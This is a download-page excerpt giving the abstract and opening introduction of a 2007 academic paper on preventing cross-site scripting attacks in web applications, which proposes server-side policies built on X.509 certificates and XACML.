• PDF / 467,134 Bytes
• 15 Pages / 430 x 660 pts Page_size
• 91 Downloads / 180 Views

DOWNLOAD

REPORT

Universitat Oberta de Catalunya, Rambla Poble Nou 156, 08018 Barcelona - Spain [email protected] 2 Universitat Autònoma de Barcelona, Edifici Q, Campus de Bellaterra, 08193, Bellaterra - Spain [email protected]

Abstract. Security is becoming one of the major concerns for web applications and other Internet based services, which are becoming pervasive in all kinds of business models and organizations. Web applications must therefore include, in addition to the expected value offered to their users, reliable mechanisms to ensure their security. In this paper, we focus on the specific problem of preventing cross-site scripting attacks against web applications. We present a study of this kind of attacks, and survey current approaches for their prevention. The advantages and limitations of each proposal are discussed, and an alternative solution is introduced. Our proposition is based on the use of X.509 certificates, and XACML for the expression of authorization policies. By using our solution, developers and/or administrators of a given web application can specifically express its security requirements from the server side, and require the proper enforcement of such requirements on a compliant client. This strategy is seamlessly integrated in generic web applications by relaying in the SSL and secure redirect calls. Keywords: Software Protection; Code Injection Attacks; Security Policies.

1 Introduction The use of the web paradigm is becoming an emerging strategy for application software companies [6]. It allows the design of pervasive applications which can be potentially used by thousands of customers from simple web clients. Moreover, the existence of new technologies for the improvement of web features (e.g., Ajax [7]) allows software engineers the conception of new tools which are not longer restricted to specific operating systems (such as web based document processors [11], social network services [12], weblogs [41], etc.). However, the inclusion of effective security mechanisms on those web applications is an increasing concern [40]. Besides the expected value that the applications are offering to their potential users, reliable mechanisms for the protection of those data and resources associated to the web application should also be offered. Existing approaches 

This work has been supported by funding from the Spanish Ministry of Science and Education, under the projects CONSOLIDER CSD2007-00004 “ARES” and TSI2006-03481.

R. Meersman and Z. Tari et al. (Eds.): OTM 2007, Part II, LNCS 4804, pp. 1770–1784, 2007. c Springer-Verlag Berlin Heidelberg 2007 

Prevention of Cross-Site Scripting Attacks on Current Web Applications

1771

to secure traditional applications are not always sufficient when addressing the web paradigm and often leave end users responsible for the protection of key aspects of a service. This situation must be avoided since, if not well managed, it could allow inappropriate uses of a web application and lead to a violation of its security requirements. We focus in this p

Recommend Documents

Scripting and Security in Computer Networks and Web Browsers

143 26 9MB

Web-to-Application Injection Attacks on Android: Characterization and Detection

186 106 537KB

DevOps for Azure Applications Deploy Web Applications on Azure

196 63 5MB

Efficient Prevention Mechanism Against Spam Attacks for Social Networking Sites

182 5 52MB

Migrating legacy Web applications

201 61 2MB

Deploy Multitiered Web Applications

181 33 16MB

Composite Web Applications

187 35 2MB

Web 2.0 Applications

159 89 2MB

Safer Scripting Through Precompilation

185 75 5MB

Geospatial Semantic Web: Applications

202 10 239KB

Current Trends in Web Engineering 10th International Conference on W

162 66 17MB

Shell Scripting Basics

164 113 15MB